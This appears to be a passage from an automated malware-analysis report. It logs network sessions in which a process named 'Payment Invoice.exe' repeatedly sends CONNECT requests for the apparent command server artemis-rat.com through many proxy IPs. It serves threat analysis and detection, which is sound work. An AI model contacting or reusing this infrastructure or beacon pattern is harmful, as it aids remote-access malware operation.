                                                                Mar 11, 2024 16:15:14.530605078 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.45003443.153.52.1554437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.234710932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.45003543.153.52.1554437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.235507965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.45003743.153.52.1554437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.236330986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.45003843.153.52.1554437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.237021923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.449873174.64.199.8241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.241468906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.44985358.234.116.19781977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.264777899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.449906178.128.156.21980007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.270561934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.495043993 CET32INHTTP/1.0 504 Gateway Timeout


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.449866178.128.207.96188777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.279994965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.948540926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.886054039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.824466944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.620990038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.449943104.16.105.106807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.281379938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.435941935 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.45008891.231.186.1334437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.304934025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.45009091.231.186.1334437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.305583000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.45009191.231.186.1334437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.306710958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.45009291.231.186.1334437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.307727098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.449966104.16.106.65807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.312325954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.466672897 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.44994237.187.77.58107107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.314169884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.449898160.16.90.3531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.329241991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.724739075 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.449852220.248.70.23790027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.330357075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.700517893 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.449836103.190.54.14180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.331403017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.44990018.134.236.23131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.335345984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.627979994 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.449949142.54.237.3441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.344034910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.44993872.10.160.9257757076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.345043898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.449996104.18.20.160807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.348243952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.502500057 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.4498971.15.62.1256787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.356967926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.44991094.131.106.19631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.357253075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.026664019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.946696997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.870184898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589693069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.321830988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.089545012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.480521917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.276729107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.449889212.108.145.19590907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.372569084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.741324902 CET310INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 150
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.449998162.214.197.102519187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.378329992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.854792118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.401706934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.505640030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.450024172.67.181.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.378611088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.533163071 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.449921119.28.60.6480907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.392060041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.042911053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:47.701335907 CET315INHTTP/1.1 400 Bad Request
                                                                Server: hzg/hzg
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 168
                                                                Connection: close
